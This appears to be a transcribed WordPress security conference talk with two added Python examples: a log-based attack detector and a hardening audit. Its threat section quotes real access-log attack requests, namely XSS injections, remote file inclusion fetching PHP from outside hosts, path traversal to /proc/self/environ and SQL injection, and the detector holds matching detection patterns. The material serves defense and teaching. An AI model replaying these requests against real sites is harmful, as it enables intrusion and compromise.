Trends, Threats, Defenses
WordPress Website Security
04/11/2023
root@wcmia # WHOIS PEREZBOX
Expertise: None
Specialization: Website Security, Incident Handling, Log Analysis
Special Interests: Warfare, Weapons, Martial Arts
Tony Perez | @perezbox | @sucuri_security | #WCMIA 2
Website Security Company
Global Operations
All Website Platforms
Scan 1M Unique Domains a Month
Block 1M web attacks a Month
300 – 500 websites a day
Signature / Heuristic Based
24/5 - 18/2 operations
Today’s Discussion
Trends, Threats, Defenses
SIMPLE RIGHT?
Trends
Explosion in Web Malicious Links
[Chart: Malicious Links, 2011 vs. 2012, labelled 600%]
Malicious Links?
[Diagram: Malicious Links, arriving via Social Media, Email Links, Website]
The Web Is The Source
[Chart: Known Malware vs. Unknown Malware, labelled 90%]
What’s a Good Host?
[Chart: Not Infected vs. Infected, labelled 85%]
Malware Type Distribution
[Chart: Malware Type Distribution – categories: Remote iFrame Includes, Remote JavaScript Includes, SPAM Injections, Obfuscated / Encoded JavaScript, Conditional Redirects, Defacements, Other; values shown: 26%, 19%, 16%, 14%, 11%, 4%, 10%]
9 Million Unique Domains Scanned
~19% Infected
Moving Beyond WordPress
Apache / SSH / Email Server
Going deeper than the application layer, targeting the server.
Server polymorphism – a.k.a. it changes a lot
Exploiting Forms
Stick With Reputable Sources
Gravity Forms
JetPack Forms
Generating SPAM emails, resource hogs
IP blacklisting
Spear Phishing Rise
Search Engine Poisoning (SEP)
Pharmacy, Payday Loans
Automated Attacks
WP-Admin
Theme / Plugin Editor
Payload
Widgets too…
Access – so easy, yet so weak
Cross-Site Contamination
[Diagram: Site 1, Site 2, Site 3, Site 4]
iFrame Injections
Drive By Downloads
Targeting Java Zero Days
Targeting Mobile Devices
Google is On Fire
There’s a Tool for that
Explosion in the Malware as a Service (MaaS) trade – yes, pay someone to hack for you
Different tools to break in and generate payloads: brute force and vulnerability exploits, malware payloads
Blackhole Exploit Kit – today’s market leader (2013, SophosLabs)
Don’t Worry, Everyone is a Target
Threats
Anatomy of Web Attacks
Recon, Identify, Attack, Decisions, Sustain
Use for malware? Burrow into network? Steal data?
What kind of website do you have?
Cross-Site Scripting (XSS)
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored / Reflective
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI / LFI)
SQL Injection
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
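Added example, not from the slides: a small Python detector that parses Apache-style access-log lines like the XSS, file-inclusion and SQL injection excerpts above and tags each request with the attack class its pattern matches. The sample log is constructed from those excerpts (IP and hostname on the timthumb line are placeholders) plus one benign control line; the signatures are coarse, illustrative assumptions, not a WAF ruleset.

```python
import re
from urllib.parse import unquote

# Constructed sample log, adapted from the access-log excerpts on these slides;
# the sixth line is a benign request added as a control.
SAMPLE_LOG = r'''
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Apr/2013:00:32:58 -0400] "GET /wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fexample.invalid%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0"
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0"
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0"
192.0.2.10 - - [03/Apr/2013:13:10:00 -0400] "GET /2013/04/hello-world/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
'''

# Apache combined-log prefix: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One coarse signature per attack class shown on the slides (assumed patterns).
RULES = {
    "xss":  re.compile(r"<\s*/?script|\bon(?:error|load|mouseover)\s*=", re.I),
    "rfi":  re.compile(r"[?&](?:src|file|page|url|path)=(?:https?|ftp)://", re.I),
    "lfi":  re.compile(r"(?:\.\./){2,}|/proc/self/environ|\x00", re.I),
    "sqli": re.compile(r"\bunion\b[\s/*]+(?:all\s+)?select\b|'\s*or\s+'?\d+'?\s*=\s*'?\d+", re.I),
}

def parse_line(line):
    """Split one log line into its fields, or return None for anything that is not a request."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(path):
    """URL-decode the request path (twice, to unwrap double encoding) and list matching classes."""
    decoded = unquote(unquote(path.replace("+", " ")))
    return [name for name, rx in RULES.items() if rx.search(decoded)]

def scan(log_text):
    """Return (ip, status, [classes]) for every request that trips at least one rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and (tags := classify(rec["path"])):
            hits.append((rec["ip"], rec["status"], tags))
    return hits

if __name__ == "__main__":
    for ip, status, tags in scan(SAMPLE_LOG):
        print(f"{ip:16} {status} {','.join(tags)}")
```

Note that the status codes matter when triaging: the 200 responses on the file-inclusion and union-select lines deserve a closer look than the 404.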
Spear Phishing
Backdoors
What’s all this mean?
Brand Reputation
Legal Implications
Impact to Sales
Blacklisted by Search Engines
Blacklisted by Payment Processors
Worst Day of Your Life
Defenses
Areas to Focus On
Access Control, Vulnerabilities, Hosting, Online Habits, Social Media, Passwords
Manage our own expectations
“It’s about risk reduction… risk will never be zero…”
The Foundation
We run on WordPress – current version, of course
Sucuri properties suffer ~125,000 web-based attacks a month on average
~4,000 attacks a day; this spikes on occasion
Doesn’t include server-level attacks
All flavors of attacks
Defense in Depth Approach
Instead of telling you what you need to do, I’ll just tell you what we do;
Our philosophy and approach is very simple: complex things break in complex ways;
We focus on the areas that we can immediately control;
We believe in layered defenses;
What we do…for web Access
IP Whitelisting
Two Factor Authentication
Strong / Unique Password
Web Application Firewall
Log Everything
What we do…for Vulnerabilities
Stay Current
Use Trusted Sources
Avoid Soup Kitchen Servers
Web Application Firewall
Log Everything
What we do…for Servers
IP Whitelisting
Server Isolation
Public Key Authentication
Host Intrusion Detection System (HIDS)
Log Everything
My Personal Configurations… Tools…
Category | Tool | Type
Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service
Prevention – Access Control | Sucuri CloudProxy | Service
Detection | Sucuri Monitoring | Service
Remediation | Sucuri | Service
Password Management | 1Password / LastPass | Application
Host-based Intrusion Detection System | OSSEC | Application
Access Control Enforcement | Login Secure Solutions | Plugin
Two-Factor Authentication | Google Authenticator | Plugin
Application Auditing | Sucuri Premium | Plugin
Backups | VaultPress | Plugin
My Personal Configurations… cntd..
Category | Location | Type
Disable Theme / Plugin Editor | wp-config.php | Preventive measure
Disable PHP execution | .htaccess – uploads / images / wp-includes / etc. | Preventive measure
Permissions | Directories 755 / Files 644 | Preventive measure
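Added example, not the author’s tooling: a Python audit that checks a WordPress tree for the three preventive measures in the table (DISALLOW_FILE_EDIT set in wp-config.php, an .htaccess that denies PHP in uploads and wp-includes, and 755/644 permissions). It assumes Apache .htaccess syntax and builds its own throwaway sample tree to run against; the check names and the directory list are assumptions for illustration.

```python
import os
import re
import stat
import tempfile

# Hypothetical checks for the three "Preventive measure" rows above. Assumes Apache
# .htaccess syntax (either the 2.2 "Deny from all" or the 2.4 "Require all denied" form).
EDITOR_OFF = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)
PHP_DENIED = re.compile(r"<Files(?:Match)?\s[^>]*php[^>]*>.*?(?:Deny from all|Require all denied).*?</Files(?:Match)?>", re.I | re.S)
NO_PHP_DIRS = ("wp-content/uploads", "wp-includes")  # directories that never need to run PHP

def read(path):
    """Return a file's text, or '' if it is absent (absence is itself a finding)."""
    return open(path).read() if os.path.isfile(path) else ""

def audit(root):
    """Return a list of findings for a WordPress tree; an empty list means all three controls hold."""
    findings = []
    if not EDITOR_OFF.search(read(os.path.join(root, "wp-config.php"))):
        findings.append("theme/plugin editor enabled: DISALLOW_FILE_EDIT not set in wp-config.php")
    for rel in NO_PHP_DIRS:
        if not PHP_DENIED.search(read(os.path.join(root, rel, ".htaccess"))):
            findings.append(f"PHP execution not blocked by {rel}/.htaccess")
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            p = os.path.join(dirpath, name)
            mode, want = stat.S_IMODE(os.lstat(p).st_mode), 0o755 if os.path.isdir(p) else 0o644
            if mode != want:
                findings.append(f"{os.path.relpath(p, root)} is {mode:o}, expected {want:o}")
    return findings

def build_fixture(hardened):
    """Create a throwaway mini WordPress tree (constructed sample) and return its path."""
    root = tempfile.mkdtemp()
    for rel in NO_PHP_DIRS:
        os.makedirs(os.path.join(root, rel))
        if hardened:
            with open(os.path.join(root, rel, ".htaccess"), "w") as f:
                f.write('<FilesMatch "\\.php$">\n  Require all denied\n</FilesMatch>\n')
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php\n" + ("define('DISALLOW_FILE_EDIT', true);\n" if hardened else ""))
    for dirpath, _, filenames in os.walk(root):
        os.chmod(dirpath, 0o755)
        for name in filenames:  # an unhardened tree is left with a world-writable config
            os.chmod(os.path.join(dirpath, name), 0o644 if hardened else 0o666)
    return root

if __name__ == "__main__":
    for line in audit(build_fixture(hardened=False)) or ["no findings"]:
        print(line)
```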
Notable Resources
Name | URL
Sucuri Blog | http://blog.sucuri.net
Sucuri TV | http://sucuri.tv
WordPress Forum – Hacked | http://wordpress.org/tags/hacked
WordPress Forum – Malware | http://wordpress.org/tags/malware
Badware Busters | https://badwarebusters.org
Perishable Press | http://perishablepress.com/category/web-design/security/
Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
Questions?
Thanks